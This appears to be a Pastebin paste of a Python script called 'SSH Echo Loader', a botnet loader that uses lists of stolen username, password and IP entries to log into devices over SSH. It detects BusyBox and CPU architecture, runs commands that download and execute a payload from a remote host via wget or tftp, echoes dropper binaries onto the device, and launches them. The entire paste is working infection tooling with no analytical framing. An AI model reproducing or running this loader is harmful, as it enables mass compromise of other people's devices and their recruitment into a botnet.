Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #SSH Echo Loader
- from threading import Thread
- #from multiprocessing import Process
- import sys, os, re, time, socket
- from Queue import *
- from sys import stdout
- import glob
- import paramiko
- if len(sys.argv) < 3:
- sys.exit("Usage: python "+sys.argv[0]+" <list> <threads>")
- paramiko.util.log_to_file("/dev/null")
- c = open(sys.argv[1], "r").readlines()
- threads = int(sys.argv[2])
- cmd_TFTP = "cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; tftp -r tbin.sh -g 1.3.3.7; sh tbin.sh"
- cmd_WGET = "cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://1.3.3.7:80/bin.sh; sh bin.sh"
- queue = Queue()
- qc = 0
- dropper_dir = "bins/*"
- droppers = glob.glob(dropper_dir)
- for dropper in droppers:
- if "x86" in dropper:
- print "x86 Dropper Added"
- X86 = dropper
- elif "arm" in dropper and "7" not in dropper:
- print "ARM Dropper Added"
- ARM = dropper
- elif "arm7" in dropper:
- print "ARM7 Dropper Added"
- ARM7 = dropper
- elif "ppc" in dropper:
- print "PPC Dropper Added"
- PPC = dropper
- elif "sh4" in dropper:
- print "SH4 Dropper Added"
- SH4 = dropper
- elif "mips" in dropper:
- print "Mips Dropper Added"
- MIPS = dropper
- elif "mpsl" in dropper:
- print "Mipsel Dropper Added"
- MPSL = dropper
- print
- for cs in c:
- qc += 1
- stdout.write("\r[%d] Added to queue" % qc)
- stdout.flush()
- queue.put(cs)
- print "\n"
- def sshload(username,password,ip):
- try:
- ip = ip.rstrip("\n")
- tftp = 0
- wget = 0
- echo = 0
- port = 22
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- ssh.connect(ip, port = port, username=username, password=password, timeout=3)
- # print "Connected! %s"%(ip)
- ssh.exec_command("sh")
- time.sleep(0.001)
- ssh.exec_command("enable")
- time.sleep(0.001)
- ssh.exec_command("system")
- time.sleep(0.001)
- ssh.exec_command("shell")
- time.sleep(0.001)
- ssh.exec_command("cat | sh")
- time.sleep(0.001)
- stdin, stdout, stderr = ssh.exec_command("/bin/busybox")
- o = stdout.read()
- #checking
- if "tftp" in o and "BusyBox" in o:
- tftp = 1
- elif "wget" in o and "BusyBox" in o:
- wget = 1
- elif "wget" not in o and "tftp" not in o and "BusyBox" in o:
- echo = 1
- # if "BusyBox" in o:
- # echo = 1
- # else:
- # pass
- #executing
- if tftp:
- print "(TFTP) COMMAND SENT: %s"%(ip)
- ssh.exec_command(cmd_TFTP)
- ssh.close()
- elif wget:
- print "(WGET) COMMAND SENT: %s"%(ip)
- ssh.exec_command(cmd_WGET)
- ssh.close()
- elif echo:
- time.sleep(0.001)
- stdin, stdout, stderr = ssh.exec_command('cat /proc/cpuinfo | grep -E "model|type|imple"; uname -m')
- ARCH_TYPE = stdout.read()
- print "- CHECKING ARCH TO DEPLOY HEX %s"%(ip)
- if "x86_64" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: x86_64 %s:%s:%s"%(username,password,ip)
- a = open(X86, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in a:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "ARMv4" in ARCH_TYPE or "armv4l" in ARCH_TYPE or "v4l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-4 %s:%s:%s"%(username,password,ip)
- b = open(ARM, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in b:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "ARMv5" in ARCH_TYPE or "armv5l" in ARCH_TYPE or "v5l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-5 %s:%s:%s"%(username,password,ip)
- c = open(ARM, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in c:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "ARMv6" in ARCH_TYPE or "armv6l" in ARCH_TYPE or "v6l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-6 %s:%s:%s"%(username,password,ip)
- d = open(ARM, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in d:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "ARMv7" in ARCH_TYPE or "armv7l" in ARCH_TYPE or "v7l" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: ARM-7 %s:%s:%s"%(username,password,ip)
- e = open(ARM7, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in e:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "MIPS" in ARCH_TYPE or "mips16" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: MIPS %s:%s:%s"%(username,password,ip)
- f = open(MIPS, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in f:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "mips64" in ARCH_TYPE or "mipsel" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: MIPSEL %s:%s:%s"%(username,password,ip)
- g = open(MPSL, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in g:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "SUPERH" in ARCH_TYPE or "sh4" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: SH4 %s:%s:%s"%(username,password,ip)
- h = open(SH4, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in h:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- elif "POWERPC" in ARCH_TYPE or "ppc" in ARCH_TYPE:
- print "(ECHO) ARCH DETECTED: PPC %s:%s:%s"%(username,password,ip)
- i = open(PPC, "r").readlines()
- ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST")
- ssh.exec_command("rm -rf lno")
- for L in i:
- ssh.exec_command(L)
- time.sleep(0.005)
- ssh.exec_command("\n")
- print "executed %s:%s:%s"%(username,password,ip)
- ssh.exec_command("chmod 777 lno; lno; ./dvrHelper ssh.LiGhT")
- time.sleep(10)
- ssh.close()
- except:
- ssh.close()
- pass
- def main():
- while True:
- try:
- for l in xrange(threads):
- try:
- IP = queue.get()
- ip = IP.split(":")
- thread = Thread(target=sshload, args=(ip[0],ip[1],ip[2],))
- thread.start()
- username=ip[0]
- password=ip[1]
- ip=ip[2]
- queue.task_done()
- except:
- pass
- time.sleep(2)
- except:
- pass
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement